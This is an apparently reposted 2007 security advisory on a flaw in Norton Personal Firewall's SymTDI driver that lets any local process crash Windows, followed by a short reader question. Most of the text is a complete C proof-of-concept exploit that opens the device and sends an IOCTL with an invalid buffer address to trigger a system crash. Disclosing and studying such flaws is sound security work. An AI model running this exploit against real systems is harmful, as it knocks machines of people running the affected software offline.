Symantec Norton Personal Internet Firewall is "a widely used desktop firewalling application for Microsoft Windows NT, 98, 2000 platforms and Windows ME. Typically, personal firewalls are deployed upon mobile workstations that leave the enterprise and may be deployed upon public networks to enable them to establish connectivity back to the corporation and thus require protection from malicious attackers while outside the confines of the enterprise firewall".
A vulnerability in Norton's SymTDI device driver allows local attackers to crash the system by sending the driver malformed data: the driver does not restrict which processes may open it, and it does not validate the input buffer it receives.
Credit:
The information has been provided by Matousec - Transparent security Research.
The original article can be found at: http://www.matousec.com/info/advisories/Norton-Insufficient-validation-of-SymTDI-driver-input-buffer.php
Vulnerable software:
* Norton Personal Firewall 2006 version 9.1.1.7
* Norton Personal Firewall 2006 version 9.1.0.33
* probably all versions of Norton Personal Firewall 2006, Norton Internet Security 2006 and other products that use SymTDI driver
* possibly older versions of Norton Personal Firewall and Norton Internet Security
Norton insufficiently protects its SymTDI driver (reachable from user mode as \\.\Global\SymTDI, the name the test program below opens) against manipulation by malicious applications, and the driver fails to validate its input buffer. Any local application can open the device and send it arbitrary data through DeviceIoControl; the driver implicitly trusts that data as valid. The input buffer can be assembled so that the driver performs an invalid memory operation and crashes the whole operating system. Further impacts of this bug, such as the possibility of arbitrary code execution in kernel mode, were not examined.
Events:
* 2007-03-15: Advisory released
* 2007-03-15: Vendor notification
Exploit:
/*
Testing program for Insufficient validation of "SymTDI" driver input buffer (BTP00012P002NF)
Usage:
prog
(the program is executed without special arguments)
Description:
This program uses the standard Windows API CreateFile to open the "SymTDI" driver and, using DeviceIoControl,
sends a malicious buffer to the driver that crashes the system.
Test:
Running the testing program.
*/
#include <stdio.h>
#include <windows.h>

void about(void)
{
    printf("Testing program for Insufficient validation of \"SymTDI\" driver input buffer (BTP00012P002NF)\n");
    printf("Windows Personal Firewall analysis project\n");
    printf("Copyright 2007 by Matousec - Transparent security\n");
    printf("http://www.matousec.com/\n\n");
    return;
}

void usage(void)
{
    printf("Usage: test\n"
           "  (the program is executed without special arguments)\n");
    return;
}

/*
formats and prints the error message for the system's last error on the standard error output
*/
void print_last_error(void)
{
    LPSTR buf;
    DWORD code = GetLastError();
    /* explicit ANSI variant so the code builds the same way with or without UNICODE defined */
    if (FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, code, 0,
                       (LPSTR)&buf, 0, NULL))
    {
        fprintf(stderr, "Error code: %lu\n", (unsigned long)code);
        fprintf(stderr, "Error message: %s", buf);
        LocalFree(buf);
    }
    else
        fprintf(stderr, "Unable to format error message for code %lu.\n", (unsigned long)code);
    return;
}

int main(int argc, char **argv)
{
    HANDLE file;
    (void)argv;
    about();
    if (argc != 1)
    {
        usage();
        return 1;
    }
    /* the device is opened without any special privilege: the driver does not restrict who may open it */
    file = CreateFileA("\\\\.\\Global\\SymTDI", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
                       NULL, OPEN_EXISTING, 0, NULL);
    if (file != INVALID_HANDLE_VALUE)
    {
        DWORD retlen;
        /* the input and output buffer pointers are deliberately the invalid address 1; a driver that
           validated its input buffer would reject the request, SymTDI dereferences it and the system crashes */
        DeviceIoControl(file, 0x83022003, (PVOID)1, 256, (PVOID)1, 256, &retlen, NULL);
        CloseHandle(file);
    }
    else
    {
        fprintf(stderr, "Unable to open SymTDI device.\n");
        print_last_error();
        fprintf(stderr, "\n");
    }
    /* reached only if the system survived the request, i.e. the driver is not vulnerable */
    printf("\nTEST FAILED!\n");
    return 1;
}
Subject: have question
Date: 23 Mar. 2007
From: azlanlannorazlanxpdchotmail.com
Can the code run on C++? Just want to know.